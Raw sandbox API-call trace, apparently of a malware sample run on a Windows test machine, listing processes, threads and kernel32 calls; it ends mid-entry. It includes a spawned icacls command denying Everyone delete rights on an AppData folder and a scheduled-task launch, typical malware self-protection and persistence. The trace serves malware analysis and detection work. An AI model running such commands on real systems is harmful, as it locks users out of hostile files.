hHeap=0x750000, dwFlags=0x0, lpMem=0x3221e88 | out: hHeap=0x750000) returned 1 [0097.192] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31a04c0 | out: hHeap=0x750000) returned 1 [0097.192] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7ab458 | out: hHeap=0x750000) returned 1 [0097.249] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x79f810 | out: hHeap=0x750000) returned 1 [0097.249] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x750000) returned 1 [0097.249] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31f6b70 | out: hHeap=0x750000) returned 1 [0097.250] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31f6278 | out: hHeap=0x750000) returned 1 [0097.250] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x771488 | out: hHeap=0x750000) returned 1 [0097.257] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7705a0 | out: hHeap=0x750000) returned 1 [0097.257] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18e730 | out: phModule=0x18e730) returned 0 [0097.258] ExitProcess (uExitCode=0x0) [0097.299] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x321c8a8 | out: hHeap=0x750000) returned 1 [0097.299] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x76f1c8 | out: hHeap=0x750000) returned 1 [0097.364] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0x418 Thread: id = 3 os_tid = 0x534 Thread: id = 4 os_tid = 0x7e0 Thread: id = 5 os_tid = 0xa04 Thread: id = 6 os_tid = 0x9dc Thread: id = 7 os_tid = 0x618 Thread: id = 22 os_tid = 0x40c Thread: id = 23 os_tid = 0xb0 Thread: id = 76 os_tid = 0x310 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 8 os_tid = 0x988 Thread: id = 9 os_tid = 0x35c Thread: id = 10 os_tid = 0x768 Thread: id = 11 os_tid = 0x764 Thread: id = 12 os_tid = 0x758 Thread: id = 13 os_tid = 0x724 Thread: id = 14 os_tid = 0x718 Thread: id = 15 os_tid = 0x714 Thread: id = 16 os_tid = 0x630 Thread: id = 17 os_tid = 0x154 Thread: id = 18 os_tid = 0x150 Thread: id = 19 os_tid = 0x120 Thread: id = 20 os_tid = 0x118 Thread: id = 21 os_tid = 0xf0 Thread: id = 117 os_tid = 0x5f4 Thread: id = 122 os_tid = 0x78c Thread: id = 172 os_tid = 0x34c Thread: id = 175 os_tid = 0x710 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 24 os_tid = 0x7e4 Thread: id = 25 os_tid = 0x7d4 Thread: id = 26 os_tid = 0x304 Thread: id = 27 os_tid = 0xac0 Thread: id = 28 os_tid = 0xb54 Thread: id = 29 os_tid = 0xb50 Thread: id = 30 os_tid = 0x3a4 Thread: id = 31 os_tid = 0xab0 Thread: id = 32 os_tid = 0xab4 Thread: id = 33 os_tid = 0xaf8 Thread: id = 34 os_tid = 0x320 Thread: id = 35 os_tid = 0x6cc Thread: id = 36 os_tid = 0x42c Thread: id = 37 os_tid = 0x1e4 Thread: id = 38 os_tid = 0x760 Thread: id = 39 os_tid = 0x75c Thread: id = 40 os_tid = 0x74c Thread: id = 41 os_tid = 0x710 Thread: id = 42 os_tid = 0x6d0 Thread: id = 43 os_tid = 0x6bc Thread: id = 44 os_tid = 0x6b8 Thread: id = 45 os_tid = 0x6b0 Thread: id = 46 os_tid = 0x69c Thread: id = 47 os_tid = 0x698 Thread: id = 48 os_tid = 0x684 Thread: id = 49 os_tid = 0x678 Thread: id = 50 os_tid = 0x4a8 Thread: id = 51 os_tid = 0x46c Thread: id = 52 os_tid = 0x44c Thread: id = 53 os_tid = 0x424 Thread: id = 54 os_tid = 0x420 Thread: id = 55 os_tid = 0x41c Thread: id = 56 os_tid = 0x404 Thread: id = 57 os_tid = 0x14c Thread: id = 58 os_tid = 0x158 Thread: id = 59 os_tid = 0x3fc Thread: id = 60 os_tid = 0x3f4 Thread: id = 61 os_tid = 0x3e8 Thread: id = 62 os_tid = 0x39c Thread: id = 63 os_tid = 0x390 Thread: id = 64 os_tid = 0x38c Thread: id = 65 os_tid = 0x388 Thread: id = 66 os_tid = 0x37c Thread: id = 67 os_tid = 0x374 Thread: id = 88 os_tid = 0x8e4 Thread: id = 89 os_tid = 0x8f4 Thread: id = 90 os_tid = 0x904 Thread: id = 91 os_tid = 0x914 Thread: id = 92 os_tid = 0x924 Thread: id = 93 os_tid = 0x934 Thread: id = 94 os_tid = 0x944 Thread: id = 95 os_tid = 0x8d4 Thread: id = 114 os_tid = 0xb04 Thread: id = 118 os_tid = 0x1c4 Thread: id = 119 os_tid = 0xab0 Thread: id = 120 os_tid = 0x3a4 Thread: id = 121 os_tid = 0x32c Thread: id = 162 os_tid = 0x978 Thread: id = 163 os_tid = 0x640 Thread: id = 164 os_tid = 0x9a4 Thread: id = 165 os_tid = 0x648 Thread: id = 166 os_tid = 0x324 Thread: id = 167 os_tid = 0x994 Thread: id = 168 os_tid = 0xa68 Thread: id = 169 os_tid = 0x5d8 Thread: id = 170 os_tid = 0x73c Process: id = "4" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x47d9e000" os_pid = "0x1c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb00" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 68 os_tid = 0x5f4 Thread: id = 69 os_tid = 0x5e4 Process: id = "5" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 70 os_tid = 0x9d4 Thread: id = 71 os_tid = 0x5b4 Thread: id = 72 os_tid = 0x5b0 Thread: id = 73 os_tid = 0x59c Thread: id = 74 os_tid = 0x594 Thread: id = 75 os_tid = 0x58c Thread: id = 115 os_tid = 0xae0 Process: id = "6" image_name = "h1rxxmjek7fnkhtt.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe" page_root = "0x47d61000" os_pid = "0x9c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb00" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 77 os_tid = 0xb64 [0097.566] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x17fbf560, dwHighDateTime=0x1d5fd35)) [0097.566] GetCurrentProcessId () returned 0x9c8 [0097.566] GetCurrentThreadId () returned 0xb64 [0097.566] GetTickCount () returned 0x114a5d1 [0097.566] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=21788332449) returned 1 [0097.660] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0097.660] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1fa0000 [0097.666] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.666] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0097.666] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0097.666] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0097.667] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0097.667] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.667] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0097.667] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.667] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0097.667] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.668] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0097.668] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.668] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0097.668] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.668] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0097.668] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.669] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0097.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.669] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0097.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.670] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0097.670] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x214) returned 0x1fa07d0 [0097.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.670] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0097.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0097.670] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0097.671] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0097.671] GetCurrentThreadId () returned 0xb64 [0097.671] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0097.671] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x800) returned 0x1fa09f0 [0097.671] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0097.671] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0097.671] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0097.671] SetHandleCount (uNumber=0x20) returned 0x20 [0097.672] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" --Admin IsNotAutoStart IsNotTask" [0097.672] GetEnvironmentStringsW () returned 0x741d90* [0097.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0097.672] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x0, Size=0x565) returned 0x1fa11f8 [0097.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1fa11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0097.672] FreeEnvironmentStringsW (penv=0x741d90) returned 1 [0097.672] GetLastError () returned 0x0 [0097.672] SetLastError (dwErrCode=0x0) [0097.672] GetLastError () returned 0x0 [0097.673] SetLastError (dwErrCode=0x0) [0097.673] GetLastError () returned 0x0 [0097.673] SetLastError (dwErrCode=0x0) [0097.673] GetACP () returned 0x4e4 [0097.673] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x0, Size=0x220) returned 0x1fa1768 [0097.673] GetLastError () returned 0x0 [0097.673] SetLastError (dwErrCode=0x0) [0097.673] IsValidCodePage (CodePage=0x4e4) returned 1 [0097.673] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0097.673] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0097.673] GetLastError () returned 0x0 [0097.673] SetLastError (dwErrCode=0x0) [0097.673] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0097.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.674] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.674] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0097.674] GetLastError () returned 0x0 [0097.674] SetLastError (dwErrCode=0x0) [0097.674] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0097.674] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.674] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鍚߁멯@Ā") returned 256 [0097.674] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鍚߁멯@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0097.674] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鍚߁멯@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.674] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿäÀ\x8d\x05\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0097.674] GetLastError () returned 0x0 [0097.674] SetLastError (dwErrCode=0x0) [0097.674] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.674] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鍚߁멯@Ā") returned 256 [0097.675] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 